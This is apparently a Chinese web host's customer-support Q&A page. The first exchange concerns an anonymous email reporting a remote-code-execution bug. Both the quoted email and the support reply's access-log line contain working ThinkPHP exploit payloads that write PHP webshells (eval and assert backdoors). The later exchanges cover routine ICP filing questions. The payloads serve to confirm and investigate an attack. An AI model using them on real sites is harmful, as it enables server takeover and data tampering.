问:你好,今天上午我方收到一封匿名邮件,提到咱们服务器有安全BUG,还请贵司看看这封邮件内容到底是真的还是假的,以下是该邮件的全文内容——我在贵站上发现了一个安全BUG,通过远程代码执行Shell提权写入网站木马到贵站根目录甚至直接提权到服务器,从而拿到贵站服务器权限更改网站数据。s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_GET['code']);?>你可以让你网站技术先自行检测服务器
以上就是这封邮件的全文,还请贵司及时处理及回复我方。,关于我方收到一封自称服务器存在安全BUG的邮件
答:您好,
127.0.0.1 – – [12/Apr/2020:22:15:53 0800] "GET //?s=index/\\\\think\\\\template\\\\driver\\\\file/write&cacheFile=p2SsQI38H2jfa951.php&content=%3C%3F%70%68%70%20%24%61%5B%27%62%27%5D%20%3D%20%27%61%73%73%65%72%74%27%3B%20%24%63%5B%5D%20%3D%20%24%61%3B%20%24%63%5B%30%5D%5B%27%62%27%5D%28%24%5F%50%4F%53%54%5B%27%5F%27%5D%29%3B%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 150045 "-" "Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)" 127.0.0.1
我们查看了下访问日志,的确有这些路径的异常请求。
建议您还是让您的技术人员核实检查一下,如果存在漏洞的话请及时修正。
另外站点数据和数据库数据请尽量定期备份到本地,空间只提供了一次备份。
空间所在的服务器安全您不用担心,我们会统一维护的。
非常感谢您对我司的支持,谢谢!
问:您好,新添加网站备案提示当前状态不能添加新的网站。请问一下这个应该怎么处理
答:您好,1,当前账户下并未提交任何备案资料,可正常提交备案申请;
2,如您无法提交,请将您填写信息页面和提示错误页面截图提交至工单,以便为您准确核实具体原因,非常感谢您对我们的支持!疫情期间,请您务必保护好自己和家人的健康,若有任何问题请随时联系我们,西部数码专人7*24小时值班,在疫情期间竭尽所能为您提供帮助!
问:您好,刚取消了一个备案信息,现在要新添加一个,现在就提示不能新添加操作。 请问一下取消备案大概需要多长时间。
问:您好,查看到的显示是预计1小时完成删除网站的变更。
答:您好,1,账户下目前并无备案记录,取消应已完成,请重新提交备案申请试试;
2,如提交时提示无法提交,请将提交信息页面截图提交至工单,以便为您准确核实;
3,取消备案管局官方回复审核时间为5个工作日,一般较快,如已无记录就可以正常再重新提交备案申请;
4,可提供您取消的域名、备案单位、备案号为您核实是否操作准确,非常感谢您对我们的支持!疫情期间,请您务必保护好自己和家人的健康,若有任何问题请随时联系我们,西部数码专人7*24小时值班,在疫情期间竭尽所能为您提供帮助!